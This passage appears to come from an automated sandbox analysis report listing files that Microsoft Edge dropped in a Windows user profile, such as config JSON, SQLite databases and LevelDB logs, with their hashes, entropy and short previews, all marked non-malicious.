                                                                                                                                                                                                                                                                                                      SHA1:136DD3F07EE3A6679CBF3AC8F5B14C853781F0C7
                                                                                                                                                                                                                                                                                                      SHA-256:1013A03ABA7251660A43D1FB44FAFAC1318A03E7FC5A5F53D453DA99B84BE5DF
                                                                                                                                                                                                                                                                                                      SHA-512:DAF058F3A730A6BF2709D71130AF033C7393C672CCCA8BE8A5ADA9750CE214D72C96AFA3F6887447452325A2DC0890D50DD8DD655268F34D2B2393BA4B03A99E
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...............`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):11755
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                      MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                      SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                      SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                      SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\cf212797-33b7-4714-bc3f-7f298cc50a31.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                      MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                      SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                      SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                      SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.10196763987470935
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:+i/1iWFi/1iW8/DspEjVl/PnnnnnnnnnnnvoQ/Eou:+UiWFUiW8/8oPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                                      MD5:7034C3B1278C753C06150AF6829134C3
                                                                                                                                                                                                                                                                                                      SHA1:508D52D00C3398108C1DF45AC51E5FAD32988736
                                                                                                                                                                                                                                                                                                      SHA-256:32D38ADEA18766C1EF5803FCED2E6C7947B842C983DC057D35F03DC43E6CFF65
                                                                                                                                                                                                                                                                                                      SHA-512:30C441F6BFFBC43B4B753FDA4C67C4D78B92EDB22C766AA22F32EADF964EACBC31317C1053DBAC7658C4C68DA8C4E2AC0D1565D85A1812DF7F64CCFDAB679B04
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:..-.............M.......Vi.3...=$J...V.......)....-.............M.......Vi.3...=$J...V.......)..........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):317272
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8886937323226495
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:384:fIKBeIo8IinI2luyIjl8vyIhTMRyIRm4yIoOwyIao213yI2Wv8HXy4yCly7yQPyX:4y6XQqxo
                                                                                                                                                                                                                                                                                                      MD5:5756D0EE989246363ACE615D13D6AD79
                                                                                                                                                                                                                                                                                                      SHA1:407449961B5DEB5D7EF18E73D135E79C9437409F
                                                                                                                                                                                                                                                                                                      SHA-256:9A5B9DB7BC1D086EB2AB334BBBB0F92FD001B8A1CD0CD6BBCE5F6CCA843AE0FA
                                                                                                                                                                                                                                                                                                      SHA-512:C022047C909C40B61A611CB37D704A5DE79BFDAFEA024CBC3C6C9E98A207965433CB9895F677DCB626EE1D50EA3B1D20A9AF2D591A4561AC302160B60B85F186
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:7....-..........$J...V....M7'.z.........$J...V..h.IR..4.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):694
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5283748534437134
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuuK7lkUlldFAs87:pHayThk8lA
                                                                                                                                                                                                                                                                                                      MD5:6223C3BC38C57DE52071F5FFB57786B0
                                                                                                                                                                                                                                                                                                      SHA1:BF9554E06EFEF1544420ECF33B41E8894FE5DE36
                                                                                                                                                                                                                                                                                                      SHA-256:8F96B1F82A2F413B401902FB8C4C88704EF5AB55E2F34CE2B9A26301AE0F52D5
                                                                                                                                                                                                                                                                                                      SHA-512:98DDACA0FA482F734AB9777939894AA223DAB1660EEE567541407A51F87EFEA9B65E6DEF78D50689D4CFEA5A713B831DC6F6E87EAFE06A93CD3978C201943ED1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=................8.6;...............#38_h.......6.Z..W.F.....z.......z............V.e....................0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):325
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.253372367897325
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOabN1L+q2PN723oH+TcwtfrK+IFUt8sOabNjKWZmw+sOabN1LVkwON723oH+Tcq:xv1L+vVaYeb23FUt8sv2W/+sv1LV5OaR
                                                                                                                                                                                                                                                                                                      MD5:8CEAA54FA8CABE4218C06BBFF22C179C
                                                                                                                                                                                                                                                                                                      SHA1:23FA680F6ABA04AE5AEBF722DB349C67D3B29A03
                                                                                                                                                                                                                                                                                                      SHA-256:6FBFAC1E81C61C9A5749DE288F8DB0523DC066DD954744E4995E31D5D3CF5324
                                                                                                                                                                                                                                                                                                      SHA-512:505FEEA9306DCBA4AB105D12D85BB34A53609EF6B54CFD0288FB4F97BDA63B53B20B83A74C7F4523068911A2FF65C725F0031DFCEA3B91051358F14FE7E4ACE8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.298 53c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/23-11:14:57.298 53c Recovering log #3.2024/12/23-11:14:57.298 53c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):325
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.253372367897325
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOabN1L+q2PN723oH+TcwtfrK+IFUt8sOabNjKWZmw+sOabN1LVkwON723oH+Tcq:xv1L+vVaYeb23FUt8sv2W/+sv1LV5OaR
                                                                                                                                                                                                                                                                                                      MD5:8CEAA54FA8CABE4218C06BBFF22C179C
                                                                                                                                                                                                                                                                                                      SHA1:23FA680F6ABA04AE5AEBF722DB349C67D3B29A03
                                                                                                                                                                                                                                                                                                      SHA-256:6FBFAC1E81C61C9A5749DE288F8DB0523DC066DD954744E4995E31D5D3CF5324
                                                                                                                                                                                                                                                                                                      SHA-512:505FEEA9306DCBA4AB105D12D85BB34A53609EF6B54CFD0288FB4F97BDA63B53B20B83A74C7F4523068911A2FF65C725F0031DFCEA3B91051358F14FE7E4ACE8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.298 53c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/23-11:14:57.298 53c Recovering log #3.2024/12/23-11:14:57.298 53c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):816
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                                                                                                      MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                                                                                                      SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                                                                                                      SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                                                                                                      SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):343
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.219950165354706
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOaZpyq2PN723oH+TcwtfrzAdIFUt8sOaZ/1Zmw+sOaZpRkwON723oH+TcwtfrzS:x/pyvVaYeb9FUt8s/9/+s/pR5OaYeb2J
                                                                                                                                                                                                                                                                                                      MD5:E81F87DA66835FAD61D98E90CA9733CF
                                                                                                                                                                                                                                                                                                      SHA1:13EA4894FF61031CD19DA6E39B74C8A297A39ECB
                                                                                                                                                                                                                                                                                                      SHA-256:B6C80EFE7ABF4BF378939A228ED724B40FC0E0845344E43542D0A4365DFE446B
                                                                                                                                                                                                                                                                                                      SHA-512:CA309F90891FD41B7DE4988453DFBBE2134CFDB5880BEAE7FD92E80BFC19145250703157705FA73BEF2865ED58DCD4151DE702860085DEFC7FDEACFFABCAC135
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.295 374 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/23-11:14:57.295 374 Recovering log #3.2024/12/23-11:14:57.295 374 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):343
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.219950165354706
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOaZpyq2PN723oH+TcwtfrzAdIFUt8sOaZ/1Zmw+sOaZpRkwON723oH+TcwtfrzS:x/pyvVaYeb9FUt8s/9/+s/pR5OaYeb2J
                                                                                                                                                                                                                                                                                                      MD5:E81F87DA66835FAD61D98E90CA9733CF
                                                                                                                                                                                                                                                                                                      SHA1:13EA4894FF61031CD19DA6E39B74C8A297A39ECB
                                                                                                                                                                                                                                                                                                      SHA-256:B6C80EFE7ABF4BF378939A228ED724B40FC0E0845344E43542D0A4365DFE446B
                                                                                                                                                                                                                                                                                                      SHA-512:CA309F90891FD41B7DE4988453DFBBE2134CFDB5880BEAE7FD92E80BFC19145250703157705FA73BEF2865ED58DCD4151DE702860085DEFC7FDEACFFABCAC135
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.295 374 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/23-11:14:57.295 374 Recovering log #3.2024/12/23-11:14:57.295 374 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):120
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                      MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                      SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                      SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                      SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                                                      MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                                                      SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                                                      SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                                                      SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:117.0.2045.55

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.0898018136551775
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWBdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynn0kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:D97F50FFCB5706CD18AA51F6BB81C6CA
                                                                                                                                                                                                                                                                                                      SHA1:38F68E971CF53E78DB46DA70E66F1F41F793FD4B
                                                                                                                                                                                                                                                                                                      SHA-256:0D3226017EF75ED36EED0FAF059760596E0C70A57A8456FAF63C80D497721B2D
                                                                                                                                                                                                                                                                                                      SHA-512:3647F063E1588DEBFE34B2EDDD0A74E96AFB02A4EA30D32E4B00A4113311A594348C1A836F70E8744981E5EC8D5EA721C8303B42C90C68FF81D960960416768B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41e23.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.0898018136551775
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWBdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynn0kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:D97F50FFCB5706CD18AA51F6BB81C6CA
                                                                                                                                                                                                                                                                                                      SHA1:38F68E971CF53E78DB46DA70E66F1F41F793FD4B
                                                                                                                                                                                                                                                                                                      SHA-256:0D3226017EF75ED36EED0FAF059760596E0C70A57A8456FAF63C80D497721B2D
                                                                                                                                                                                                                                                                                                      SHA-512:3647F063E1588DEBFE34B2EDDD0A74E96AFB02A4EA30D32E4B00A4113311A594348C1A836F70E8744981E5EC8D5EA721C8303B42C90C68FF81D960960416768B
                                                                                                                                                                                                                                                                                                      Malicious:false
